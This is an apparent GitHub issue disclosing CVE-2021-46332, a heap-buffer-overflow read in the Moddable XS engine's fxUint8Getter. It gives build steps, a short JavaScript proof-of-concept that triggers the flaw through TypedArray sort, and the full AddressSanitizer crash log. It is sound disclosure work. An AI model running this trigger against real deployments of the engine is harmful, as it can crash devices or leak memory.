Headline
CVE-2021-46332: Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter · Issue #752 · Moddable-OpenSource/moddable
Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via xs/sources/xsDataView.c in fxUint8Getter.
Moddable-XS revision
Commit: db8f973
Version: 11.5.0 32 4
Build environment
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
cd ~/moddable/xs/makefiles/lin #(debug) make -f xst.mk
Test case
var buf = new ArrayBuffer(65552); var numbers = new Uint8Array(buf); function v() { return 7; } function JSEtest(a, b) { return { valueOf: v }; } numbers.sort(JSEtest);
Execution & Output
$ ./xst poc.js
================================================================= ========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90 READ of size 1 at 0x7f86d2bfe7ff thread T0 #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883 #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234 #2 0x5558b4e8e7d9 in fx_TypedArray_prototype_sort /root/moddable/xs/sources/xsDataView.c:2303 #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842 #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281 #7 0x7f86d6cd0bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #8 0x5558b4d1d789 in _start (/root/moddable/build/bin/lin/debug/xst+0x93789)
0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region [0x7f86d2bfe800,0x7f86d3bfe820) allocated by thread T0 here: #0 0x7f86d773bb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter Shadow bytes around the buggy address: 0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb =======ABORTING
Credits: Found by OWL337 team.